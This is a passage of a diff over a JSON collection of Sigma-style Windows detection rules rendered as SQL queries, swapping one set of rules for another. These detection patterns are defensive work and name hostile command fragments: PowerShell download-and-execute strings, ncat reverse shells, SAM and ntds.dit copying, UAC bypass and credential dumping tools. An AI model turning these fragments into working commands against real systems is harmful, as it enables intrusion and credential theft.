ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "status": "test", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate import of keys" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" - }, - { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE 